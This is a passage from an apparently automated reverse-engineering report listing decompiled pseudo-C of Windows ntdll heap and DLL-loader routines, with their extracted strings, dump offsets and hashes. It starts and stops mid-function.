                                      																}
                                      															}
                                      														}
                                      													}
                                      													goto L56;
                                      												}
                                      												goto L22;
                                      											}
                                      											asm("lock inc dword [eax]");
                                      											goto L21;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      						return _t143;
                                      					}
                                      				} else {
                                      					_push( &_v8);
                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                      					_push(__ecx + 0x40);
                                      					_push(_t121);
                                      					_push(0xffffffff);
                                      					_t80 = E019B9A00();
                                      					_t159 = _t80;
                                      					if(_t159 < 0) {
                                      						L8:
                                      						return _t80;
                                      					} else {
                                      						goto L2;
                                      					}
                                      				}
                                      				L56:
                                      			}

                                      Strings
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 019D9C28
                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 019D9C18
                                      • LdrpDoPostSnapWork, xrefs: 019D9C1E
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 2994545307-1948996284
                                      • Opcode ID: 38416af722b5322561e1622519b00fc5605fadec6c2dfd5ca8a80d78e10d6cb7
                                      • Instruction ID: f857666941f5b4f9299b12c2e6ff4b9be8d859f614ff3e7188d0b5372024f523
                                      • Opcode Fuzzy Hash: 38416af722b5322561e1622519b00fc5605fadec6c2dfd5ca8a80d78e10d6cb7
                                      • Instruction Fuzzy Hash: 12912771A10206EFEF18FF59D480ABAB7B9FF84315B844169D91DAB251D730ED01CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E019AAC7B(void* __ecx, signed short* __edx) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				void* __ebx;
                                      				signed char _t75;
                                      				signed int _t79;
                                      				signed int _t88;
                                      				intOrPtr _t89;
                                      				signed int _t96;
                                      				signed char* _t97;
                                      				intOrPtr _t98;
                                      				signed int _t101;
                                      				signed char* _t102;
                                      				intOrPtr _t103;
                                      				signed int _t105;
                                      				signed char* _t106;
                                      				signed int _t131;
                                      				signed int _t138;
                                      				void* _t149;
                                      				signed short* _t150;
                                      
                                      				_t150 = __edx;
                                      				_t149 = __ecx;
                                      				_t70 =  *__edx & 0x0000ffff;
                                      				__edx[1] = __edx[1] & 0x000000f8;
                                      				__edx[3] = 0;
                                      				_v8 =  *__edx & 0x0000ffff;
                                      				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                      					_t39 =  &(_t150[8]); // 0x8
                                      					E019CD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                      					__edx[1] = __edx[1] | 0x00000004;
                                      				}
                                      				_t75 =  *(_t149 + 0xcc) ^  *0x1a68a68;
                                      				if(_t75 != 0) {
                                      					L4:
                                      					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                      						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                      						_t79 =  *(_t149 + 0x50);
                                      						 *_t150 =  *_t150 ^ _t79;
                                      						return _t79;
                                      					}
                                      					return _t75;
                                      				} else {
                                      					_t9 =  &(_t150[0x80f]); // 0x1017
                                      					_t138 = _t9 & 0xfffff000;
                                      					_t10 =  &(_t150[0x14]); // 0x20
                                      					_v12 = _t138;
                                      					if(_t138 == _t10) {
                                      						_t138 = _t138 + 0x1000;
                                      						_v12 = _t138;
                                      					}
                                      					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                      					if(_t75 > _t138) {
                                      						_v8 = _t75 - _t138;
                                      						_push(0x4000);
                                      						_push( &_v8);
                                      						_push( &_v12);
                                      						_push(0xffffffff);
                                      						_t131 = E019B96E0();
                                      						__eflags = _t131 - 0xc0000045;
                                      						if(_t131 == 0xc0000045) {
                                      							_t88 = E01A23C60(_v12, _v8);
                                      							__eflags = _t88;
                                      							if(_t88 != 0) {
                                      								_push(0x4000);
                                      								_push( &_v8);
                                      								_push( &_v12);
                                      								_push(0xffffffff);
                                      								_t131 = E019B96E0();
                                      							}
                                      						}
                                      						_t89 =  *[fs:0x30];
                                      						__eflags = _t131;
                                      						if(_t131 < 0) {
                                      							__eflags =  *(_t89 + 0xc);
                                      							if( *(_t89 + 0xc) == 0) {
                                      								_push("HEAP: ");
                                      								E0197B150();
                                      							} else {
                                      								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      							}
                                      							_push(_v8);
                                      							_push(_v12);
                                      							_push(_t149);
                                      							_t75 = E0197B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                      							goto L4;
                                      						} else {
                                      							_t96 =  *(_t89 + 0x50);
                                      							_t132 = 0x7ffe0380;
                                      							__eflags = _t96;
                                      							if(_t96 != 0) {
                                      								__eflags =  *_t96;
                                      								if( *_t96 == 0) {
                                      									goto L10;
                                      								}
                                      								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                      								L11:
                                      								__eflags =  *_t97;
                                      								if( *_t97 != 0) {
                                      									_t98 =  *[fs:0x30];
                                      									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                      									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                      										E01A314FB(_t132, _t149, _v12, _v8, 7);
                                      									}
                                      								}
                                      								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                      								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                      								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                      								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                      								_t101 =  *( *[fs:0x30] + 0x50);
                                      								__eflags = _t101;
                                      								if(_t101 != 0) {
                                      									__eflags =  *_t101;
                                      									if( *_t101 == 0) {
                                      										goto L13;
                                      									}
                                      									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                      									goto L14;
                                      								} else {
                                      									L13:
                                      									_t102 = _t132;
                                      									L14:
                                      									__eflags =  *_t102;
                                      									if( *_t102 != 0) {
                                      										_t103 =  *[fs:0x30];
                                      										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                      										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                      											__eflags = E01997D50();
                                      											if(__eflags != 0) {
                                      												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                      												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                      											}
                                      											E01A31411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                      										}
                                      									}
                                      									_t133 = 0x7ffe038a;
                                      									_t105 =  *( *[fs:0x30] + 0x50);
                                      									__eflags = _t105;
                                      									if(_t105 != 0) {
                                      										__eflags =  *_t105;
                                      										if( *_t105 == 0) {
                                      											goto L16;
                                      										}
                                      										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                      										goto L17;
                                      									} else {
                                      										L16:
                                      										_t106 = _t133;
                                      										L17:
                                      										__eflags =  *_t106;
                                      										if( *_t106 != 0) {
                                      											__eflags = E01997D50();
                                      											if(__eflags != 0) {
                                      												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                      												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                      											}
                                      											E01A31411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                      										}
                                      										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                      										_t150[1] = _t75;
                                      										goto L4;
                                      									}
                                      								}
                                      							}
                                      							L10:
                                      							_t97 = _t132;
                                      							goto L11;
                                      						}
                                      					} else {
                                      						goto L4;
                                      					}
                                      				}
                                      			}


                                      Strings
                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 019EA0CD
                                      • HEAP: , xrefs: 019EA0BA
                                      • HEAP[%wZ]: , xrefs: 019EA0AD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                      • API String ID: 0-1340214556
                                      • Opcode ID: b0f9fa4ca8039a22d6c0a6217e5500426c78be489e272f3d6baaf61b51b299a2
                                      • Instruction ID: bd69ffb7b6665bb229c4b827a2a0becc079377e907c314f29737a16bbe222b81
                                      • Opcode Fuzzy Hash: b0f9fa4ca8039a22d6c0a6217e5500426c78be489e272f3d6baaf61b51b299a2
                                      • Instruction Fuzzy Hash: 07812631600684EFE726CBACC988FA9BBF8FF05701F0405A5E589876A2D734ED44CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			E0199B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                      				signed int _v8;
                                      				char _v12;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __ebp;
                                      				void* _t72;
                                      				char _t76;
                                      				signed char _t77;
                                      				intOrPtr* _t80;
                                      				unsigned int _t85;
                                      				signed int* _t86;
                                      				signed int _t88;
                                      				signed char _t89;
                                      				intOrPtr _t90;
                                      				intOrPtr _t101;
                                      				intOrPtr* _t111;
                                      				void* _t117;
                                      				intOrPtr* _t118;
                                      				signed int _t120;
                                      				signed char _t121;
                                      				intOrPtr* _t123;
                                      				signed int _t126;
                                      				intOrPtr _t136;
                                      				signed int _t139;
                                      				void* _t140;
                                      				signed int _t141;
                                      				void* _t147;
                                      
                                      				_t111 = _a4;
                                      				_t140 = __ecx;
                                      				_v8 = __edx;
                                      				_t3 = _t111 + 0x18; // 0x0
                                      				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                      				_t5 = _t111 - 8; // -32
                                      				_t141 = _t5;
                                      				 *(_t111 + 0x14) = _a8;
                                      				_t72 = 4;
                                      				 *(_t141 + 2) = 1;
                                      				 *_t141 = _t72;
                                      				 *((char*)(_t141 + 7)) = 3;
                                      				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                      				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                      					_t76 = (_t141 - __edx >> 0x10) + 1;
                                      					_v12 = _t76;
                                      					__eflags = _t76 - 0xfe;
                                      					if(_t76 >= 0xfe) {
                                      						_push(__edx);
                                      						_push(0);
                                      						E01A3A80D(_t134, 3, _t141, __edx);
                                      						_t76 = _v12;
                                      					}
                                      				} else {
                                      					_t76 = 0;
                                      				}
                                      				 *((char*)(_t141 + 6)) = _t76;
                                      				if( *0x1a68748 >= 1) {
                                      					__eflags = _a12 - _t141;
                                      					if(_a12 <= _t141) {
                                      						goto L4;
                                      					}
                                      					_t101 =  *[fs:0x30];
                                      					__eflags =  *(_t101 + 0xc);
                                      					if( *(_t101 + 0xc) == 0) {
                                      						_push("HEAP: ");
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                      					E0197B150();
                                      					__eflags =  *0x1a67bc8;
                                      					if(__eflags == 0) {
                                      						E01A32073(_t111, 1, _t140, __eflags);
                                      					}
                                      					goto L3;
                                      				} else {
                                      					L3:
                                      					_t147 = _a12 - _t141;
                                      					L4:
                                      					if(_t147 != 0) {
                                      						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                      					}
                                      					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                      						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                      						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                      					}
                                      					_t135 =  *(_t111 + 0x14);
                                      					if( *(_t111 + 0x14) == 0) {
                                      						L12:
                                      						_t77 =  *((intOrPtr*)(_t141 + 6));
                                      						if(_t77 != 0) {
                                      							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                      						} else {
                                      							_t117 = _t140;
                                      						}
                                      						_t118 = _t117 + 0x38;
                                      						_t26 = _t111 + 8; // -16
                                      						_t80 = _t26;
                                      						_t136 =  *_t118;
                                      						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                      							_push(_t118);
                                      							_push(0);
                                      							E01A3A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                      						} else {
                                      							 *_t80 = _t136;
                                      							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                      							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                      							 *_t118 = _t80;
                                      						}
                                      						_t120 = _v8;
                                      						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                      						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                      						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                      						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                      						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                      							__eflags =  *(_t140 + 0xb8);
                                      							if( *(_t140 + 0xb8) == 0) {
                                      								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                      								__eflags = _t88 - 2;
                                      								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                      								__eflags =  *0x1a68720 & 0x00000001;
                                      								_t89 = _t88 & 0xffffff00 | ( *0x1a68720 & 0x00000001) == 0x00000000;
                                      								__eflags = _t89 & _t121;
                                      								if((_t89 & _t121) != 0) {
                                      									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                      								}
                                      							}
                                      						}
                                      						_t85 =  *(_t111 + 0x14);
                                      						if(_t85 >= 0x7f000) {
                                      							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                      						}
                                      						_t86 = _a16;
                                      						 *_t86 = _t141 - _a12 >> 3;
                                      						return _t86;
                                      					} else {
                                      						_t90 = E0199B8E4(_t135);
                                      						_t123 =  *((intOrPtr*)(_t90 + 4));
                                      						if( *_t123 != _t90) {
                                      							_push(_t123);
                                      							_push( *_t123);
                                      							E01A3A80D(0, 0xd, _t90, 0);
                                      						} else {
                                      							 *_t111 = _t90;
                                      							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                      							 *_t123 = _t111;
                                      							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                      						}
                                      						_t139 =  *(_t140 + 0xb8);
                                      						if(_t139 != 0) {
                                      							_t93 =  *(_t111 + 0x14) >> 0xc;
                                      							__eflags = _t93;
                                      							while(1) {
                                      								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                      								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                      									break;
                                      								}
                                      								_t126 =  *_t139;
                                      								__eflags = _t126;
                                      								if(_t126 != 0) {
                                      									_t139 = _t126;
                                      									continue;
                                      								}
                                      								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                      								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                      								break;
                                      							}
                                      							E0199E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                      						}
                                      						goto L12;
                                      					}
                                      				}
                                      			}


                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-1334570610
                                      • Opcode ID: 61ba5ae976c88285ff5a080b7c8dbe63d4c1a394ccb6d7a3331840b358787b91
                                      • Instruction ID: 7412318d6823e241578cd2a1d699d645a4bd4e8094dadea9ea46eb8eaf606606
                                      • Opcode Fuzzy Hash: 61ba5ae976c88285ff5a080b7c8dbe63d4c1a394ccb6d7a3331840b358787b91
                                      • Instruction Fuzzy Hash: 7B61AC706002019FDB29CF2DD484F6ABBE9FF48305F18856AE84E8F651D734E881CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E01987E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                      				char _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				signed int _t73;
                                      				void* _t77;
                                      				char* _t82;
                                      				char* _t87;
                                      				signed char* _t97;
                                      				signed char _t102;
                                      				intOrPtr _t107;
                                      				signed char* _t108;
                                      				intOrPtr _t112;
                                      				intOrPtr _t124;
                                      				intOrPtr _t125;
                                      				intOrPtr _t126;
                                      
                                      				_t107 = __edx;
                                      				_v12 = __ecx;
                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                      				_t124 = 0;
                                      				_v20 = __edx;
                                      				if(E0198CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                      					_t112 = _v8;
                                      				} else {
                                      					_t112 = 0;
                                      					_v8 = 0;
                                      				}
                                      				if(_t112 != 0) {
                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                      						_t124 = 0xc000007b;
                                      						goto L8;
                                      					}
                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                      					 *(_t125 + 0x34) = _t73;
                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                      						goto L3;
                                      					}
                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                      					_t124 = E0197C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                      					if(_t124 < 0) {
                                      						goto L8;
                                      					} else {
                                      						goto L3;
                                      					}
                                      				} else {
                                      					L3:
                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                      						L8:
                                      						return _t124;
                                      					}
                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                      							goto L5;
                                      						}
                                      						_t102 =  *0x1a65780; // 0x0
                                      						if((_t102 & 0x00000003) != 0) {
                                      							E019F5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                      							_t102 =  *0x1a65780; // 0x0
                                      						}
                                      						if((_t102 & 0x00000010) != 0) {
                                      							asm("int3");
                                      						}
                                      						_t124 = 0xc0000428;
                                      						goto L8;
                                      					}
                                      					L5:
                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                      						goto L8;
                                      					}
                                      					_t77 = _a4 - 0x40000003;
                                      					if(_t77 == 0 || _t77 == 0x33) {
                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                      						if(E01997D50() != 0) {
                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      						} else {
                                      							_t82 = 0x7ffe0384;
                                      						}
                                      						_t108 = 0x7ffe0385;
                                      						if( *_t82 != 0) {
                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                      								if(E01997D50() == 0) {
                                      									_t97 = 0x7ffe0385;
                                      								} else {
                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      								}
                                      								if(( *_t97 & 0x00000020) != 0) {
                                      									E019F7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                      								}
                                      							}
                                      						}
                                      						if(_a4 != 0x40000003) {
                                      							L14:
                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                      							if(E01997D50() != 0) {
                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      							} else {
                                      								_t87 = 0x7ffe0384;
                                      							}
                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                      								if(E01997D50() != 0) {
                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      								}
                                      								if(( *_t108 & 0x00000020) != 0) {
                                      									E019F7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                      								}
                                      							}
                                      							goto L8;
                                      						} else {
                                      							_v16 = _t125 + 0x24;
                                      							_t124 = E019AA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                      							if(_t124 < 0) {
                                      								E0197B1E1(_t124, 0x1490, 0, _v16);
                                      								goto L8;
                                      							}
                                      							goto L14;
                                      						}
                                      					} else {
                                      						goto L8;
                                      					}
                                      				}
                                      			}





















                                      Strings
                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 019D9891
                                      • minkernel\ntdll\ldrmap.c, xrefs: 019D98A2
                                      • LdrpCompleteMapModule, xrefs: 019D9898
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                      • API String ID: 0-1676968949
                                      • Opcode ID: b7df8047e69e48525a33bc06af2bc9ff4c02ef3b3df14ab52826b83623b6e0e5
                                      • Instruction ID: 9044d81e0a94e7bf332b89af20cb1dbf437ce1ccf7eb7869e13f90cd9b7e2158
                                      • Opcode Fuzzy Hash: b7df8047e69e48525a33bc06af2bc9ff4c02ef3b3df14ab52826b83623b6e0e5
                                      • Instruction Fuzzy Hash: A8512531600745DBEB29EB9CC984F2A7BE8AF41714F240599E9599B7E2C734FD00CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E01A223E3(signed int __ecx, unsigned int __edx) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t42;
                                      				char _t43;
                                      				signed short _t44;
                                      				signed short _t48;
                                      				signed char _t51;
                                      				signed short _t52;
                                      				intOrPtr _t54;
                                      				signed short _t64;
                                      				signed short _t66;
                                      				intOrPtr _t69;
                                      				signed short _t73;
                                      				signed short _t76;
                                      				signed short _t77;
                                      				signed short _t79;
                                      				void* _t83;
                                      				signed int _t84;
                                      				signed int _t85;
                                      				signed char _t94;
                                      				unsigned int _t99;
                                      				unsigned int _t104;
                                      				signed int _t108;
                                      				void* _t110;
                                      				void* _t111;
                                      				unsigned int _t114;
                                      
                                      				_t84 = __ecx;
                                      				_push(__ecx);
                                      				_t114 = __edx;
                                      				_t42 =  *((intOrPtr*)(__edx + 7));
                                      				if(_t42 == 1) {
                                      					L49:
                                      					_t43 = 1;
                                      					L50:
                                      					return _t43;
                                      				}
                                      				if(_t42 != 4) {
                                      					if(_t42 >= 0) {
                                      						if( *(__ecx + 0x4c) == 0) {
                                      							_t44 =  *__edx & 0x0000ffff;
                                      						} else {
                                      							_t73 =  *__edx;
                                      							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                      								_t73 = _t73 ^  *(__ecx + 0x50);
                                      							}
                                      							_t44 = _t73 & 0x0000ffff;
                                      						}
                                      					} else {
                                      						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x1a6874c ^ __ecx;
                                      						if(_t104 == 0) {
                                      							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                      						} else {
                                      							_t76 = 0;
                                      						}
                                      						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                      					}
                                      					_t94 =  *((intOrPtr*)(_t114 + 7));
                                      					_t108 = _t44 & 0xffff;
                                      					if(_t94 != 5) {
                                      						if((_t94 & 0x00000040) == 0) {
                                      							if((_t94 & 0x0000003f) == 0x3f) {
                                      								if(_t94 >= 0) {
                                      									if( *(_t84 + 0x4c) == 0) {
                                      										_t48 =  *_t114 & 0x0000ffff;
                                      									} else {
                                      										_t66 =  *_t114;
                                      										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                      											_t66 = _t66 ^  *(_t84 + 0x50);
                                      										}
                                      										_t48 = _t66 & 0x0000ffff;
                                      									}
                                      								} else {
                                      									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x1a6874c ^ _t84;
                                      									if(_t99 == 0) {
                                      										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                      									} else {
                                      										_t69 = 0;
                                      									}
                                      									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                      								}
                                      								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                      							} else {
                                      								_t85 = _t94 & 0x3f;
                                      							}
                                      						} else {
                                      							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                      						}
                                      					} else {
                                      						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                      					}
                                      					_t110 = (_t108 << 3) - _t85;
                                      				} else {
                                      					if( *(__ecx + 0x4c) == 0) {
                                      						_t77 =  *__edx & 0x0000ffff;
                                      					} else {
                                      						_t79 =  *__edx;
                                      						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                      							_t79 = _t79 ^  *(__ecx + 0x50);
                                      						}
                                      						_t77 = _t79 & 0x0000ffff;
                                      					}
                                      					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                      				}
                                      				_t51 =  *((intOrPtr*)(_t114 + 7));
                                      				if(_t51 != 5) {
                                      					if((_t51 & 0x00000040) == 0) {
                                      						_t52 = 0;
                                      						goto L42;
                                      					}
                                      					_t64 = _t51 & 0x3f;
                                      					goto L38;
                                      				} else {
                                      					_t64 =  *(_t114 + 6) & 0x000000ff;
                                      					L38:
                                      					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                      					L42:
                                      					_t35 = _t114 + 8; // -16
                                      					_t111 = _t110 + (_t52 & 0x0000ffff);
                                      					_t83 = _t35 + _t111;
                                      					_t54 = E019CD4F0(_t83, 0x1956c58, 8);
                                      					_v8 = _t54;
                                      					if(_t54 == 8) {
                                      						goto L49;
                                      					}
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push("HEAP: ");
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					_push(_t111);
                                      					_push(_v8 + _t83);
                                      					E0197B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                      					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                      						 *0x1a66378 = 1;
                                      						asm("int3");
                                      						 *0x1a66378 = 0;
                                      					}
                                      					_t43 = 0;
                                      					goto L50;
                                      				}
                                      			}





























                                      Strings
                                      • HEAP: , xrefs: 01A2255C
                                      • HEAP[%wZ]: , xrefs: 01A2254F
                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 01A2256F
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                      • API String ID: 0-3815128232
                                      • Opcode ID: f7633d2fc537ca4740dcbe3f0b1f204f5580ab3459056dbe5bc6fbfc67e3c585
                                      • Instruction ID: a517dac3026e7c455087a0e0dad245b792c335b23e8f3bb7add643887298acda
                                      • Opcode Fuzzy Hash: f7633d2fc537ca4740dcbe3f0b1f204f5580ab3459056dbe5bc6fbfc67e3c585
                                      • Instruction Fuzzy Hash: 5B51F3341002708AE375CF2EC8447B27BF1EF88645F58885BE9D78B286D67AD847DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E0197E620(void* __ecx, short* __edx, short* _a4) {
                                      				char _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				char* _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v44;
                                      				signed int _v48;
                                      				intOrPtr _v52;
                                      				void* _v56;
                                      				void* _v60;
                                      				char _v64;
                                      				void* _v68;
                                      				void* _v76;
                                      				void* _v84;
                                      				signed int _t59;
                                      				signed int _t74;
                                      				signed short* _t75;
                                      				signed int _t76;
                                      				signed short* _t78;
                                      				signed int _t83;
                                      				short* _t93;
                                      				signed short* _t94;
                                      				short* _t96;
                                      				void* _t97;
                                      				signed int _t99;
                                      				void* _t101;
                                      				void* _t102;
                                      
                                      				_t80 = __ecx;
                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                      				_t96 = __edx;
                                      				_v44 = __edx;
                                      				_t78 = 0;
                                      				_v56 = 0;
                                      				if(__ecx == 0 || __edx == 0) {
                                      					L28:
